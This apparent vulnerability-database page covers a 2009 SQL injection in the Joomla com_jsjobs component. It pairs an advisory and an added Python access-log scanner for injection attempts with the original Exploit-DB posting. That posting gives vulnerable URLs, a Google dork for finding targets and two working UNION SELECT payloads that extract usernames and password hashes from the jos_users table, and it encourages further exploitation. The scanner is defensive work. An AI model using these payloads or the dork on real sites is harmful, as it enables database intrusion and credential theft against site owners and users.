Vendor: JS Jobs
By: kaMtiEz
CVSS: 7.5 (HIGH)
Vulnerability: SQL injection
CWE: 89
Product Name: JS Jobs
Affected Version From: 1.0.5.6
Affected Version To: 1.0.5.6
Patch Exists: YES
Related CWE: N/A
CPE: a:joomshark:js_jobs
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_jsjobs Multiple SQL injection vulnerability

A vulnerability exists in Joomla Component com_jsjobs which allows an attacker to inject malicious SQL queries via the 'vm' and 'vj' parameters in the 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.
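For sites that cannot upgrade immediately, web server logs can be reviewed for requests matching this issue. The following is an added example, not part of the original advisory or the vendor's code: it scans access-log lines for `com_jsjobs` requests whose `vm`, `vj`, `md` or `oi` values are not plain integers. The combined log format, the assumption that these parameters carry integer identifiers, the token list, and the function names are all assumptions; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters named on this page for com_jsjobs (description and sample URLs).
WATCHED = ("vm", "vj", "md", "oi")
# Heuristic token list (assumption): none of these belong in an identifier.
SQL_TOKENS = re.compile(
    r"\bunion\b.*\bselect\b|\bconcat(?:_ws)?\s*\(|@@version|\bversion\s*\(|--|/\*",
    re.IGNORECASE | re.DOTALL,
)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Dec/2009:10:00:01 +0700] "GET /index.php?option=com_jsjobs'
    '&c=jsjobs&view=employer&layout=view_company&vm=3&md=7 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [09/Dec/2009:10:02:17 +0700] "GET /index.php?option=com_jsjobs'
    '&c=jsjobs&view=employer&layout=view_company&vm=3'
    '&md=-1+union+all+select+1,2,3-- HTTP/1.1" 200 5300',
    '192.0.2.44 - - [09/Dec/2009:10:02:40 +0700] "GET /index.php?option=com_jsjobs'
    '&c=jsjobs&view=employer&layout=view_job&vj=5&jobcat=2&oi=1%27 HTTP/1.1" 500 310',
    '192.0.2.10 - - [09/Dec/2009:10:03:00 +0700] "GET /index.php?option=com_content'
    '&id=4 HTTP/1.1" 200 2048',
]

def inspect_line(line):
    """Return (parameter, reason) findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    # parse_qs URL-decodes values, so %27 and '+' are normalised before matching.
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "com_jsjobs" not in query.get("option", []):
        return []
    findings = []
    for name in WATCHED:
        for value in query.get(name, []):
            if SQL_TOKENS.search(value):
                findings.append((name, "sql-token"))
            elif not re.fullmatch(r"\d+", value):
                findings.append((name, "non-numeric"))
    return findings

def scan(lines):
    """Map 1-based line number -> findings, for lines that triggered."""
    return {i: f for i, line in enumerate(lines, 1) if (f := inspect_line(line))}

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, findings)
```

Hits are review leads rather than proof of compromise; this only covers parameters sent in the query string.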

Exploit-DB raw data:

##########################################################################
## Joomla Component com_jsjobs Multiple SQL injection vulnerability 	##
## Author : kaMtiEz (kamzcrew@yahoo.com)				##
## Homepage : http://www.indonesiancoder.com    	     		##
## Date : December 9, 2009 						##
##########################################################################

[ Software Information ]

[+] Vendor : http://www.joomshark.com/
[+] Download : http://www.joomsky.com/index.php?option=com_rokdownloads&view=file&task=download&id=23:js-jobs
[+] version : 1.0.5.6
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_jsjobs"
[+] LOCATION : INDONESIA - JOGJA
[+] Note : this extension has 2 categories .. free and commercial :D
[+] price : 20$

##########################################################################
[ HERE WE GO ... LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://server/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_company&vm=kaMz&md=[INDONESIANCODER]

http://server/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=kaMtiEz&jobcat=Tukulesto&oi=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--

-666+union+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,version(),666,666,666,666,666,666,666,666,666,6666+from+jos_users--


##########################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ] 

[+] Dad, Mom, little sibling, I love you all so much .. 
[+] happy corruption day :D .. 
[+] Tukulesto : keep on exploiting ... 
[+] Gh4mb4S : be patient, okay .. there will surely be results .. hahaha
[+] where is justice in my beloved homeland ??

[ EOF ]
[+] INDONESIANCODER TEAM
[+] KILL -9 TEAM